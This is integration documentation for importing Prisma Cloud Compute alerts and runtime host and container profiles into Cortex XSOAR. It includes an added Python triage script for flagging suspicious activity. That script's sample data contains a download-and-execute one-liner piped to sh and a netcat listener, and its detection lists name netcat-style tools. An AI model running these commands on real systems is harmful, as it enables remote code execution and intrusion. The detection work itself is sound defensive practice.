
Palo Alto Networks - Prisma Cloud Compute

This integration is part of the Prisma Cloud Compute by Palo Alto Networks Pack.

Prisma™ Cloud Compute Edition delivers a cloud workload protection platform (CWPP) for modern enterprises, providing holistic protection across hosts, containers, and serverless deployments in any cloud, throughout the application lifecycle. Prisma Cloud Compute Edition is cloud native and API-enabled, protecting all your workloads regardless of their underlying compute technology or the cloud in which they run.

This integration lets you import Palo Alto Networks - Prisma Cloud Compute alerts into Cortex XSOAR.

Configure Prisma Cloud Compute to Send Alerts to Cortex XSOAR

To send alerts from Prisma Cloud Compute to Cortex XSOAR, you need to create an alert profile.

  1. Log in to your Prisma Cloud Compute console.
  2. Navigate to Manage > Alerts.
  3. Click Add Profile to create a new alert profile.
  4. On the left, select Demisto from the provider list.
  5. On the right, select the alert triggers. Alert triggers specify which alerts are sent to Cortex XSOAR.
  6. Click Save to save the alert profile.
  7. Make sure the user whose credentials the integration uses has at least the auditor role; otherwise the integration cannot fetch alerts.

Configure Prisma Cloud Compute on Cortex XSOAR

  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for Prisma Cloud Compute.
  3. Click Add instance to create and configure a new integration.

| Parameter | Description | Example |
| --- | --- | --- |
| Name | A meaningful name for the integration instance. | Prisma Cloud Compute_<alertProfileName> |
| Fetches incidents | Configures this integration instance to fetch alerts from Prisma Cloud Compute. | N/A |
| Prisma Cloud Compute Console URL | URL address and port of your Prisma Cloud Compute console. Copy the address from the alert profile created in Prisma Cloud Compute. | https://proxyserver.com |
| Prisma Cloud Compute Project Name (if applicable) | Copy the project name from the alert profile created in Prisma Cloud Compute and paste it in this field. | N/A |
| Trust any certificate (not secure) | Skips verification of the console's TLS certificate (not recommended). Leave it unchecked and supply the CA certificate in the field below instead. | N/A |
| Use system proxy settings | Runs the integration instance using the proxy server (HTTP or HTTPS) that you defined in the server configuration. | https://proxyserver.com |
| Username | Prisma Cloud Compute login credentials. | N/A |
| Prisma Cloud Compute CA Certificate | CA certificate used by Prisma Cloud Compute. Copy the certificate from the alert profile created in Prisma Cloud Compute. | N/A |
| Source Reliability | Reliability of the source providing the intelligence data. | False |

  4. Click Test to validate the integration.
  5. Click Done to save the integration.

Configure Prisma Cloud Compute User Roles

  • To access Prisma Cloud Compute resources, a user must be assigned a role.
  • Without a sufficient role, commands and incident fetching may fail.
  • The roles and their descriptions are listed below.
  • Each command's Requires Role section states the role it needs; different commands require different roles.

  1. Go to Manage > Authentication.
  2. Choose the user whose roles you want to edit, then open Actions > ... (the ellipsis menu).
  3. Click Edit and choose a role in the Role section.

User Roles Configuration

Required User Roles

The commands in this integration require the permissions of one of the following user roles (see each command's Requires Role section):

  • devSecOps
  • ci
  • auditor
  • operator
  • devOps
  • vulnerabilityManager

The administrator role can run every command in the integration.

See the user role descriptions in Prisma Cloud Compute: Available User Roles.

Commands

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

prisma-cloud-compute-profile-host-list

Get information about the hosts and their profile events. This command supports asterisks as wildcards, so you can filter host profiles by a substring of a field (for example, hostname=*163*).

Base Command

prisma-cloud-compute-profile-host-list

Requires Role

devSecOps

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| hostname | A comma-separated list of profile (hostname) IDs. For example, !prisma-cloud-compute-profile-host-list hostname="149,257". | Optional |
| limit | The maximum number of hosts and their profile events to return. Must be between 1 and 50. Default is 15. | Optional |
| offset | The offset from which to begin listing hosts and their profile events. Default is 0. | Optional |
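Every list command on this page caps `limit` at 50 and pages with `offset`, so collecting a full inventory from a playbook means looping until a short page comes back. The helper below is an added example for this README, not the integration's own code: `fetch` is any callable taking `(limit, offset)` and returning one page (in an XSOAR automation it would wrap `demisto.executeCommand` for the command in question); `FAKE_HOSTS` and `fake_fetch` are a constructed stand-in so the example runs offline.

```python
"""Page through a Prisma Cloud Compute list command (added example)."""
from typing import Callable, List, Sequence

MAX_LIMIT = 50  # documented upper bound of `limit` for the list commands


def fetch_all(fetch: Callable[[int, int], Sequence], limit: int = MAX_LIMIT,
              max_pages: int = 1000) -> List:
    """Collect every record by advancing `offset` in steps of `limit`.

    The walk ends on the first page shorter than `limit`. A page that is
    exactly full forces one more (empty) call, which is the price of not
    having a total count. `max_pages` bounds the loop so a backend that
    keeps returning full pages cannot spin an automation forever.
    """
    if not 1 <= limit <= MAX_LIMIT:
        raise ValueError(f"limit must be between 1 and {MAX_LIMIT}, got {limit}")
    results: List = []
    offset = 0
    for _ in range(max_pages):
        page = list(fetch(limit, offset))
        results.extend(page)
        if len(page) < limit:
            return results
        offset += limit
    raise RuntimeError(f"gave up after {max_pages} pages (offset {offset})")


# Constructed backend: 120 host profiles, i.e. pages of 50/50/20 at the default limit.
FAKE_HOSTS = [{"_id": f"host{i}"} for i in range(120)]


def fake_fetch(limit: int, offset: int) -> List[dict]:
    """Stand-in for the list command: slices the way offset/limit do."""
    return FAKE_HOSTS[offset:offset + limit]


def count_pages(fetch: Callable[[int, int], Sequence], limit: int = MAX_LIMIT) -> int:
    """Number of calls fetch_all makes; useful for estimating console load."""
    calls = 0

    def counting(page_limit: int, page_offset: int) -> Sequence:
        nonlocal calls
        calls += 1
        return fetch(page_limit, page_offset)

    fetch_all(counting, limit)
    return calls


if __name__ == "__main__":
    hosts = fetch_all(fake_fetch)
    print(f"{len(hosts)} hosts in {count_pages(fake_fetch)} calls")
```

The same loop works for the container, forensic and hosts-list commands below; only the callable changes.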

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ProfileHost._id | String | The profile ID (hostname). |
| PrismaCloudCompute.ProfileHost.accountID | String | The cloud account ID associated with the profile. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.command | String | The command that triggered the connection. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.modified | Date | The timestamp of when the event occurred. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.port | Number | The listening port number. |
| PrismaCloudCompute.ProfileHost.apps.listeningPorts.processPath | String | The path to the process that uses the port. |
| PrismaCloudCompute.ProfileHost.apps.name | String | The app name. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.command | String | The command that triggered the connection. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.country | String | The country ISO code for the given IP address. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.ip | String | The IP address captured over this port. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.modified | Date | The timestamp of when the event occurred. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.port | Number | The outgoing port number. |
| PrismaCloudCompute.ProfileHost.apps.outgoingPorts.processPath | String | The path to the process that uses the port. |
| PrismaCloudCompute.ProfileHost.apps.processes.command | String | The executed command. |
| PrismaCloudCompute.ProfileHost.apps.processes.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileHost.apps.processes.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileHost.apps.processes.path | String | The process binary path. |
| PrismaCloudCompute.ProfileHost.apps.processes.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileHost.apps.processes.time | Date | The time at which the process was added. If the process was modified, this is the modification time. |
| PrismaCloudCompute.ProfileHost.apps.processes.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.command | String | The executed command. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.path | String | The process binary path. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.time | Date | The time at which the process was added. If the process was modified, this is the modification time. |
| PrismaCloudCompute.ProfileHost.apps.startupProcess.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileHost.collections | String | A list of collections to which this profile applies. |
| PrismaCloudCompute.ProfileHost.created | Date | The profile creation time. |
| PrismaCloudCompute.ProfileHost.hash | Number | The uint32 hash associated with the profile. |
| PrismaCloudCompute.ProfileHost.labels | String | The labels associated with the profile. |
| PrismaCloudCompute.ProfileHost.sshEvents.command | String | The executed command. |
| PrismaCloudCompute.ProfileHost.sshEvents.country | String | The SSH client's country of origin. |
| PrismaCloudCompute.ProfileHost.sshEvents.ip | String | The connection client IP address. |
| PrismaCloudCompute.ProfileHost.sshEvents.loginTime | Date | The SSH login time. |
| PrismaCloudCompute.ProfileHost.sshEvents.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileHost.sshEvents.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileHost.sshEvents.path | String | The process binary path. |
| PrismaCloudCompute.ProfileHost.sshEvents.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileHost.sshEvents.time | Date | The time at which the process was added. If the process was modified, this is the modification time. |
| PrismaCloudCompute.ProfileHost.sshEvents.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileHost.time | Date | The last time this profile was modified. |
| PrismaCloudCompute.ProfileHost.geoip.countries.code | String | The country code of the computer that accessed the host. |
| PrismaCloudCompute.ProfileHost.geoip.countries.ip | String | The IP address of the computer that accessed the host. |
| PrismaCloudCompute.ProfileHost.geoip.countries.modified | Date | The last time the IP address associated with this country accessed the host console. |
| PrismaCloudCompute.ProfileHost.geoip.modified | Date | The last time any of the country IP addresses accessed the host console. |

Command Example

!prisma-cloud-compute-profile-host-list hostname=*163*

Context Example

```json
{
  "PrismaCloudCompute": {
    "ProfileHost": {
      "hash": 1,
      "created": "2020-11-10T09:37:30.314Z",
      "geoip": {
        "modified": "2021-12-10T11:06:03.206Z",
        "countries": [
          {
            "ip": "1.1.1.1",
            "code": "US",
            "modified": "2021-12-10T11:06:03.206Z"
          },
          {
            "ip": "2.2.2.2",
            "code": "IE",
            "modified": "2021-12-10T05:22:01.858Z"
          }
        ]
      },
      "labels": [
        "osDistro:amzn",
        "osVersion:2"
      ],
      "apps": [
        {
          "processes": [
            {
              "ppath": "/usr/lib/systemd/systemd",
              "command": "/usr/sbin/auditd",
              "user": "root",
              "time": "2020-11-10T09:37:30.415Z",
              "path": "/usr/sbin/auditd",
              "md5": ""
            }
          ],
          "startupProcess": {
            "ppath": "/usr/lib/systemd/systemd",
            "command": "/usr/sbin/auditd",
            "user": "root",
            "time": "2020-11-10T09:37:30.415Z",
            "path": "/usr/sbin/auditd",
            "md5": ""
          },
          "name": "auditd"
        },
        {
          "processes": [
            {
              "ppath": "/usr/lib/systemd/systemd",
              "command": "/usr/sbin/atd -f",
              "user": "root",
              "time": "2020-11-10T09:37:30.415Z",
              "path": "/usr/sbin/atd",
              "md5": ""
            }
          ],
          "startupProcess": {
            "ppath": "/usr/lib/systemd/systemd",
            "command": "/usr/sbin/atd -f",
            "user": "root",
            "time": "2020-11-10T09:37:30.415Z",
            "path": "/usr/sbin/atd",
            "md5": ""
          },
          "name": "atd"
        }
      ],
      "collections": [
        "All",
        "123"
      ],
      "time": "2021-12-10T11:06:03.206Z",
      "sshEvents": [
        {
          "ppath": "/usr/bin/bash",
          "country": "IL",
          "time": "December 10, 2021 11:06:03 AM",
          "command": "grep twistlock_data - High rate of events, throttling started",
          "user": "user123",
          "ip": "1.2.3.4",
          "path": "/usr/bin/grep",
          "loginTime": "September 02, 2021 09:27:41 AM",
          "md5": ""
        },
        {
          "ppath": "/usr/bin/bash",
          "country": "IL",
          "time": "December 10, 2021 11:06:03 AM",
          "command": "docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}",
          "user": "user123",
          "ip": "1.1.1.1",
          "path": "/usr/bin/docker",
          "loginTime": "September 02, 2021 09:27:41 AM",
          "md5": ""
        }
      ],
      "_id": "host163",
      "accountID": "1234"
    }
  }
}
```

Human Readable Output - One Host

Host Description

| Hostname | Distribution | Collections |
| --- | --- | --- |
| host163 | amzn 2 | All, 123 |

Apps

| AppName | StartupProcess | User | LaunchTime |
| --- | --- | --- | --- |
| auditd | /usr/sbin/auditd | root | November 10, 2020 09:37:30 AM |
| atd | /usr/sbin/atd | root | November 10, 2020 09:37:30 AM |

SSH Events

| User | Ip | ProcessPath | Command | Time |
| --- | --- | --- | --- | --- |
| user123 | 1.2.3.4 | /usr/bin/grep | grep twistlock_data - High rate of events, throttling started | December 10, 2021 11:06:03 AM |
| user123 | 1.1.1.1 | /usr/bin/docker | docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }} | December 10, 2021 11:06:03 AM |

Human Readable Output - Multiple Hosts

Host Description

| Hostname | Distribution | Collections |
| --- | --- | --- |
| host163 | amzn 2 | All, 123 |
| host249 | Ubuntu 16.04 | All, 123 |
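A host profile is most useful when something reads it for you. The script below is an added example for this README, not the integration's own code: it walks the PrismaCloudCompute.ProfileHost context (field names as in the Context Output table above) and reports SSH sessions from unexpected countries, SSH commands that touch sensitive paths such as the Docker socket (the page's own example shows one), download-and-execute one-liners, binaries flagged as modified after profiling, and listeners opened by netcat-style tools. `SAMPLE_PROFILE` is constructed in the page's shape (the page's example carries no `modified` or `listeningPorts` entries, so those are made up here), and the country allowlist, sensitive-path list and listener list are the author's assumptions.

```python
"""Triage a Prisma Cloud Compute host profile (added example)."""
import re
from typing import Dict, List

EXPECTED_SSH_COUNTRIES = {"IL", "US"}  # assumption: where operators log in from
SENSITIVE_PATHS = ("/var/run/docker.sock", "/etc/shadow", "/root/.ssh")  # assumption
SUSPICIOUS_LISTENERS = ("/usr/bin/nc", "/bin/nc", "/usr/bin/ncat", "/usr/bin/socat")  # assumption
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # "curl ... | sh"

# Constructed sample in the shape of PrismaCloudCompute.ProfileHost.
SAMPLE_PROFILE: Dict = {
    "_id": "host163",
    "labels": ["osDistro:amzn", "osVersion:2"],
    "apps": [
        {"name": "auditd",
         "startupProcess": {"path": "/usr/sbin/auditd", "user": "root", "modified": False},
         "processes": [{"path": "/usr/sbin/auditd", "user": "root", "modified": False}],
         "listeningPorts": []},
        {"name": "nc",
         "startupProcess": {"path": "/usr/bin/nc", "user": "root", "modified": True},
         "processes": [{"path": "/usr/bin/nc", "user": "root", "modified": True}],
         "listeningPorts": [{"port": 4444, "processPath": "/usr/bin/nc", "command": "nc -lp 4444"}]},
    ],
    "sshEvents": [
        {"user": "user123", "ip": "1.2.3.4", "country": "IL", "path": "/usr/bin/grep",
         "command": "grep twistlock_data -"},
        {"user": "user123", "ip": "1.1.1.1", "country": "IL", "path": "/usr/bin/docker",
         "command": "docker -H unix:///var/run/docker.sock ps -a"},
        {"user": "deploy", "ip": "5.6.7.8", "country": "RU", "path": "/usr/bin/bash",
         "command": "curl -s http://203.0.113.9/x | sh"},
    ],
}


def triage_host_profile(profile: Dict) -> List[Dict[str, str]]:
    """Return one finding per suspicious observation in a single host profile."""
    host = profile.get("_id", "<unknown>")
    findings: List[Dict[str, str]] = []

    def add(check: str, detail: str) -> None:
        findings.append({"check": check, "host": host, "detail": detail})

    seen_modified = set()
    for app in profile.get("apps", []):
        # Binaries that changed after they were first profiled; the same path
        # usually appears under both processes and startupProcess, so dedupe.
        for proc in list(app.get("processes", [])) + [app.get("startupProcess", {})]:
            path = proc.get("path", "")
            if proc.get("modified") and path not in seen_modified:
                seen_modified.add(path)
                add("modified-binary", f"{path} (app {app.get('name', '?')}, user {proc.get('user', '?')})")
        # Listeners opened by tools that have no business listening on a server.
        for lp in app.get("listeningPorts", []):
            if lp.get("processPath", "") in SUSPICIOUS_LISTENERS:
                add("suspicious-listener", f"{lp['processPath']} on port {lp.get('port')}: {lp.get('command', '')}")

    for ev in profile.get("sshEvents", []):
        where = f"{ev.get('user', '?')}@{ev.get('ip', '?')} ({ev.get('country', '??')})"
        cmd = ev.get("command", "")
        if ev.get("country") not in EXPECTED_SSH_COUNTRIES:
            add("ssh-unexpected-country", f"{where}: {cmd}")
        if any(p in cmd for p in SENSITIVE_PATHS):
            add("ssh-sensitive-path", f"{where}: {cmd}")
        if DOWNLOAD_EXEC.search(cmd):
            add("ssh-download-exec", f"{where}: {cmd}")
    return findings


def summarize(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per check, e.g. for an incident's summary field."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["check"]] = counts.get(f["check"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage_host_profile(SAMPLE_PROFILE):
        print(f"{f['host']}: [{f['check']}] {f['detail']}")
```

In a playbook the `sshEvents` loop is the part worth tuning first: the Docker socket check is exact-match on the command string, so a practitioner who wants to catch `docker` invoked without `-H` should also look at `path` ending in `/docker`.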

prisma-cloud-compute-profile-container-list

Get information about the containers and their profile events. This command supports asterisks as wildcards, so you can filter container profiles by a substring of a field (for example, image=*defender*).

Base Command

prisma-cloud-compute-profile-container-list

Requires Role

devSecOps

Input

| Argument Name | Description | Required |
| --- | --- | --- |
| cluster | A comma-separated list of runtime profile Kubernetes clusters. | Optional |
| id | A comma-separated list of runtime profile IDs. For example, !prisma-cloud-compute-profile-container-list id="256,148". | Optional |
| image | A comma-separated list of runtime profile images. For example, !prisma-cloud-compute-profile-container-list image="console,defender". | Optional |
| image_id | A comma-separated list of runtime profile image IDs. For example, !prisma-cloud-compute-profile-container-list image_id="123,456". | Optional |
| namespace | A comma-separated list of runtime profile Kubernetes namespaces. For example, !prisma-cloud-compute-profile-container-list namespace="namespace1,namespace2". | Optional |
| os | A comma-separated list of runtime profile operating systems. For example, !prisma-cloud-compute-profile-container-list os="Red Hat,Windows". | Optional |
| state | A comma-separated list of runtime profile states. For example, !prisma-cloud-compute-profile-container-list state=active. | Optional |
| limit | The maximum number of containers and their profile events to return. Must be between 1 and 50. Default is 15. | Optional |
| offset | The offset from which to begin listing containers and their profile events. Default is 0. | Optional |

Context Output

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ProfileContainer._id | String | The profile ID. |
| PrismaCloudCompute.ProfileContainer.accountIDs | String | The cloud account IDs associated with the container runtime profile. |
| PrismaCloudCompute.ProfileContainer.archived | Boolean | Whether this profile is archived. |
| PrismaCloudCompute.ProfileContainer.capabilities.ci | Boolean | Whether the container is allowed to write binaries to disk and run them, based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.cloudMetadata | Boolean | Whether the given container can query the cloud metadata API, based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dnsCache | Boolean | Whether the DNS services used by all the pods in the cluster were added to the profile, based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dynamicDNSQuery | Boolean | Whether capped behavioral DNS queries were added to the profile, based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dynamicFileCreation | Boolean | Whether capped behavioral file system paths were added to the profile, based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.dynamicProcessCreation | Boolean | Whether capped behavioral processes were added to the profile, based on static analysis. |
| PrismaCloudCompute.ProfileContainer.capabilities.k8s | Boolean | Whether the given container can perform Kubernetes networking tasks (e.g., contacting the API server). |
| PrismaCloudCompute.ProfileContainer.capabilities.proxy | Boolean | Whether the container can listen on any port and perform multiple outbound connections. |
| PrismaCloudCompute.ProfileContainer.capabilities.sshd | Boolean | Whether the container can run sshd processes. |
| PrismaCloudCompute.ProfileContainer.capabilities.unpacker | Boolean | Whether the container is allowed to write shared libraries to disk. |
| PrismaCloudCompute.ProfileContainer.cluster | String | The provided cluster name. |
| PrismaCloudCompute.ProfileContainer.collections | String | Collections to which this profile applies. |
| PrismaCloudCompute.ProfileContainer.created | Date | The profile creation time. |
| PrismaCloudCompute.ProfileContainer.entrypoint | String | The image entrypoint. |
| PrismaCloudCompute.ProfileContainer.events._id | String | The history event entity. |
| PrismaCloudCompute.ProfileContainer.events.command | String | The process that was executed. |
| PrismaCloudCompute.ProfileContainer.events.hostname | String | The hostname on which the command was invoked. |
| PrismaCloudCompute.ProfileContainer.events.time | Date | The time of the event. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.mount | Boolean | Whether the given folder is mounted. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.path | String | The file path. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.process | String | The process that accessed the file. |
| PrismaCloudCompute.ProfileContainer.filesystem.behavioral.time | Date | The time at which the file was added. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.mount | Boolean | Whether the given folder is mounted. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.path | String | The file path. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.process | String | The process that accessed the file. |
| PrismaCloudCompute.ProfileContainer.filesystem.static.time | Date | The time at which the file was added. |
| PrismaCloudCompute.ProfileContainer.hash | Number | The uint32 hash associated with the profile. |
| PrismaCloudCompute.ProfileContainer.hostNetwork | Boolean | Whether the instance shares the network namespace with the host. |
| PrismaCloudCompute.ProfileContainer.hostPid | Boolean | Whether the instance shares the PID namespace with the host. |
| PrismaCloudCompute.ProfileContainer.image | String | The image the container runs with. |
| PrismaCloudCompute.ProfileContainer.imageID | String | The profile's image ID. |
| PrismaCloudCompute.ProfileContainer.infra | Boolean | Whether this is an infrastructure container. |
| PrismaCloudCompute.ProfileContainer.istio | Boolean | Whether it is an Istio-monitored profile. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.key | String | The key of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.value | String | The value of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.name | String | The role name. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.roleBinding | String | The name of the role binding used for display. |
| PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.rules | String | The list of rules associated with the cluster role. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.labels.key | String | The key of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.labels.value | String | The value of the label. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.name | String | The Kubernetes role name. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.namespace | String | The namespace associated with the role. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.roleBinding | String | The name of the role binding used for display. |
| PrismaCloudCompute.ProfileContainer.k8s.roles.rules | String | The policy rules associated with the role. |
| PrismaCloudCompute.ProfileContainer.k8s.serviceAccount | String | The service account used to access the Kubernetes API server. This field is empty if the container is not running inside a pod. |
| PrismaCloudCompute.ProfileContainer.label | String | The profile's label. |
| PrismaCloudCompute.ProfileContainer.lastUpdate | Date | The last time this profile was modified. |
| PrismaCloudCompute.ProfileContainer.learnedStartup | Boolean | Whether the startup events were learned. |
| PrismaCloudCompute.ProfileContainer.namespace | String | The Kubernetes deployment namespace. |
| PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainName | String | The queried domain name. |
| PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainType | String | The queried domain type. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.app | String | The name of the app. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.all | Boolean | Whether this port data represents any arbitrary ports. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.port | Number | The port number. |
| PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.time | Date | The learning timestamp of this port. |
| PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.all | Boolean | Whether this port data represents any arbitrary ports. |
| PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.ports.port | Number | The port number. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.ports.time | Date | The learning timestamp of this port. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.app | String | The name of the app. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.all | Boolean | Whether this port data represents any arbitrary ports. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.port | Number | The port number. |
| PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.time | Date | The learning timestamp of this port. |
| PrismaCloudCompute.ProfileContainer.os | String | The profile image operating system. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.command | String | The executed command. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.path | String | The process binary path. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.time | Date | The time at which the process was added. If the process was modified, this is the modification time. |
| PrismaCloudCompute.ProfileContainer.processes.behavioral.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileContainer.processes.static.command | String | The executed command. |
| PrismaCloudCompute.ProfileContainer.processes.static.md5 | String | The process binary MD5 sum. |
| PrismaCloudCompute.ProfileContainer.processes.static.modified | Boolean | Whether the process binary was modified after the container started. |
| PrismaCloudCompute.ProfileContainer.processes.static.path | String | The process binary path. |
| PrismaCloudCompute.ProfileContainer.processes.static.ppath | String | The parent process path. |
| PrismaCloudCompute.ProfileContainer.processes.static.time | Date | The time at which the process was added. If the process was modified, this is the modification time. |
| PrismaCloudCompute.ProfileContainer.processes.static.user | String | The username of the user who started the process. |
| PrismaCloudCompute.ProfileContainer.relearningCause | String | The reason a profile entered learning mode after being activated. |
| PrismaCloudCompute.ProfileContainer.remainingLearningDurationSec | Number | The total time left that the system needs to finish learning this image. |
| PrismaCloudCompute.ProfileContainer.state | String | The current state of the profile. |

Command Example

!prisma-cloud-compute-profile-container-list image=*defender* limit=1

Context Example

```json
{
  "PrismaCloudCompute": {
    "ProfileContainer": {
      "image": "twistlock/private:defender_21_04_439",
      "hostNetwork": true,
      "learnedStartup": true,
      "k8s": {},
      "archived": false,
      "network": {
        "geoip": {
          "modified": "2021-12-10T13:31:42.924Z",
          "countries": [
            {
              "ip": "1.1.1.1",
              "code": "IE",
              "modified": "2021-12-10T13:31:42.922Z"
            },
            {
              "ip": "2.2.2.2",
              "code": "US",
              "modified": "2021-12-09T13:30:42.148Z"
            }
          ]
        },
        "static": {
          "listeningPorts": []
        },
        "behavioral": {
          "outboundPorts": {
            "ports": [
              {
                "port": 80,
                "time": "2021-09-02T11:05:16.836Z"
              }
            ]
          }
        }
      },
      "capabilities": {
        "ci": true
      },
      "label": "twistlock",
      "state": "active",
      "collections": [
        "All",
        "123",
        "Prisma Cloud resources"
      ],
      "entrypoint": "/usr/local/bin/defender",
      "events": null,
      "lastUpdate": "2021-09-02T11:05:10.935Z",
      "hash": 3,
      "infra": false,
      "accountIDs": [
        "123"
      ],
      "processes": {
        "static": [
          {
            "ppath": "",
            "path": "/usr/bin/mongodump",
            "time": "0001-01-01T00:00:00Z",
            "md5": ""
          },
          {
            "ppath": "",
            "path": "/usr/bin/mongorestore",
            "time": "0001-01-01T00:00:00Z",
            "md5": ""
          }
        ],
        "behavioral": [
          {
            "ppath": "/usr/local/bin/defender",
            "path": "/usr/local/bin/fsmon",
            "time": "2021-09-02T11:05:08.931Z",
            "md5": ""
          },
          {
            "ppath": "/usr/bin/apt-get",
            "path": "/usr/lib/apt/methods/gpgv",
            "time": "2021-11-24T15:12:28.502Z",
            "command": "gpgv",
            "md5": ""
          }
        ]
      },
      "created": "2020-09-02T11:05:08.931Z",
      "imageID": "sha256:8d82e2c21c33e1ffb37ea901d18df15c08123258609e6d7c4aecc7fb4a5a8738",
      "filesystem": {
        "static": [
          {
            "process": "*",
            "path": "/var/log/audit",
            "mount": true,
            "time": "2021-09-02T11:05:08.931Z"
          },
          {
            "process": "*",
            "path": "/var/lib/twistlock",
            "mount": true,
            "time": "2021-09-02T11:05:08.931Z"
          }
        ],
        "behavioral": [
          {
            "process": "/usr/local/bin/defender",
            "path": "/prisma-static-data",
            "mount": true,
            "time": "2021-09-02T11:05:10.935Z"
          },
          {
            "process": "/usr/local/bin/defender",
            "path": "/tmp",
            "mount": false,
            "time": "2021-09-02T11:05:16.784Z"
          }
        ]
      },
      "_id": "container123",
      "os": "Red Hat Enterprise Linux 8.4 (Ootpa)",
      "remainingLearningDurationSec": -1,
      "hostPid": true
    }
  }
}
```

Human Readable Output - One Container

Container Description

| ContainerID | Image | Os | State | Created | EntryPoint |
| --- | --- | --- | --- | --- | --- |
| container123 | twistlock/private:defender_21_04_439 | Red Hat Enterprise Linux 8.4 (Ootpa) | active | September 02, 2020 11:05:08 AM | /usr/local/bin/defender |

Processes

| Type | Path | DetectionTime |
| --- | --- | --- |
| static | /usr/bin/mongodump | January 01, 2021 00:00:00 AM |
| static | /usr/bin/mongorestore | January 01, 2021 00:00:00 AM |
| behavioral | /usr/local/bin/fsmon | September 02, 2021 11:05:08 AM |
| behavioral | /usr/lib/apt/methods/gpgv | November 24, 2021 15:12:28 PM |

Human Readable Output - Multiple Containers

Container Description

| ContainerID | Image | Os | State | Created | EntryPoint |
| --- | --- | --- | --- | --- | --- |
| container123 | twistlock/private:defender_21_04_439 | Red Hat Enterprise Linux 8.4 (Ootpa) | active | September 02, 2021 11:05:08 AM | /usr/local/bin/defender |
| container1234 | twistlock/private:console_21_04_439 | Red Hat Enterprise Linux 8.4 (Ootpa) | active | September 02, 2021 11:05:08 AM | /app/server |
```
